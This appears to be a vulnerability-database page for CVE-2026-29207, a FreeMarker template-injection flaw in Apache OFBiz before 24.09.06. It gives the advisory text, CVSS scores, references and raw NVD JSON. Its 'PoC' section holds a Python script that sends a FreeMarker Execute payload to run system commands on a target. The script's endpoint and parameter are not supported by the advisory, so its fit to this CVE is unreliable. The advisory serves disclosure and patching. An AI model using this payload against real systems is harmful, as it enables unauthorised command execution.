CVE-2026-29207

Description

Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. Please note that in the updated version, "Data Resource" records with dataTemplateTypeId = "FTL" are no longer supported. Additionally, in the updated version, the "Ecommerce Customer" security group no longer includes content management grants. Users are advised to remove these permissions from any production site as well.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* - VULNERABLE

Apache OFBiz < 24.09.06

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (replace with actual target)
target_url = "http://target-ip:port/webtools/control/fingerprint"

# FreeMarker payload to execute a command (e.g., id)
# This payload uses Execute class to run system commands
payload = "${'freemarker.template.utility.Execute'?new()('id')}"

# Send the malicious request
response = requests.get(target_url, params={"dataResourceId": payload})

# Check result
if response.status_code == 200:
    print("[+] Exploit successful!")
    print("[+] Response:")
    print(response.text)
else:
    print("[-] Exploit failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-29207
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-29207
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-29207/
[4] VulDB https://vuldb.com/cve/CVE-2026-29207
[5] https://lists.apache.org/thread/3rcrp8bh3x6ovrj5xnc0fm1f0nrn52r0
[6] http://www.openwall.com/lists/oss-security/2026/05/19/14

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-29207", "sourceIdentifier": "[email protected]", "published": "2026-05-19T10:16:22.390", "lastModified": "2026-05-19T19:16:46.603", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: before 24.09.06.\n\nUsers are recommended to upgrade to version 24.09.06, which fixes the issue.\n\nPlease note that in the updated version, \"Data Resource\" records with dataTemplateTypeId = \"FTL\" are no longer supported.\n\nAdditionally, in the updated version, the \"Ecommerce Customer\" security group no longer includes content management grants. Users are advised to remove these permissions from any production site as well."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.09.06", "matchCriteriaId": "CEB63EC9-E307-4D7E-98E3-142E0225D178"}]}]}], "references": [{"url": "https://lists.apache.org/thread/3rcrp8bh3x6ovrj5xnc0fm1f0nrn52r0", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/19/14", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}